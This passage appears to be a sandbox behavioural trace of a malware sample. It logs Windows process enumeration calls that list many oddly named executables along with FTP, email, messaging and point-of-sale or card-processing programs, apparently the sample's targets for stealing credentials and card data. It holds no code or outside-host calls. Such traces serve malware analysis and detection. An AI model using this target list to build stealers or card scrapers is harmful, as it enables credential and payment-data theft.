hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.278] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0203.280] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0203.282] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0203.284] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0203.286] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0203.288] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0203.290] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0203.329] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0203.332] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0203.335] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0203.337] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0203.339] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0203.342] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0203.344] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0203.347] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0203.349] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0203.352] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0203.354] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0203.357] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0203.359] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0203.362] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0203.438] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0203.441] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0203.444] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0203.447] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0203.449] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0203.453] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0203.456] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0203.458] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0203.461] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0203.464] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0203.467] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0203.469] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0203.512] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0203.515] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0203.517] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0203.519] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0203.527] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0203.530] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0203.533] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0203.536] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0203.538] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0203.540] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0203.543] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0203.546] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0203.549] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0203.552] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0203.659] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0203.662] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0203.665] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0203.668] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0203.671] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0203.673] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0203.676] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0203.679] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0203.681] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0203.684] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0203.686] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0203.689] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0203.691] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0203.703] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0203.707] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0203.709] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0203.711] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0203.714] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0203.717] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0203.719] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0203.721] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0203.724] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0203.726] CloseHandle (hObject=0x20d0) returned 1 [0203.726] Sleep (dwMilliseconds=0x64) [0203.837] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20d4 [0203.853] Process32First (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.855] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0203.859] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0203.862] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.865] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0203.868] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.870] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0203.872] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0203.905] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0203.907] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.911] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.913] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0203.915] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.918] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.920] Process32Next (in: 